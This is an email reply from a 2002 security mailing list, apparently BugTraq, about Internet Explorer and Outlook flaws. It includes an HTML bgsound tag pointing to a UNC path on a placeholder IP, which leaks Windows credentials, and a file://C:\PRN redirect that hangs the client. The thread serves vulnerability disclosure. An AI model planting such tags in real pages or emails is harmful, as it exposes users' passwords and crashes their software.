Dear Chad Loder, You're right! <bgsound src=3D"\\111.111.111.111\new\file.wav"> causes IE to connect to 111.111.111.111 via NetBT. Depending on LMCompatibilityLevel it may cause user's cleartext password or NTLMv1 challenge to leak. It's very serious bug. --Friday, May 17, 2002, 1:38:16 PM, you wrote to error@pochtamt.ru: CL> At Wednesday 5/15/2002 03:11 PM +0400, you wrote: >> Title: Special device access and DoS in Microsoft Internet >> Exporer/Outlook Express/Outlook >> >> All versions of Windows have a reserved filenames referred to special >> devices such as prn, aux, nul, etc also called DOS devices. CL> This might be related to a vulnerability that was reported to Microsoft CL> on Mar 7 2001. See the BugTraq post: CL> http://online.securityfocus.com/archive/1/197926 CL> The META HTTP-EQUIV=REFRESH tag used to do the trick CL> from Outlook and other email clients using the MS CL> HTML viewer (e.g. Eudora). Redirecting to file://C:\PRN CL> was sufficient to hang the browser or email client. CL> Microsoft assigned the following internal tracking CL> number to the issue: "MSRC 673au", and fixed it in CL> MS00-17. Obviously they didn't do a good enough CL> job, since you guys found a way to print files, etc. :) CL> Another scary thing is that you can cause the computer to connect CL> to arbitrary UNC paths, which as you know, involves sending CL> NetBIOS credentials over the wire (a good reason to use egress CL> filtering). CL> +-------------------------------- CL> Chad Loder <chad@rapid7.com> CL> Rapid 7, Inc. CL> <http://www.rapid7.com> CL> +-------------------------------- -- ~/ZARAZA Существую лишь я сам, никуда не летя. (Лем)
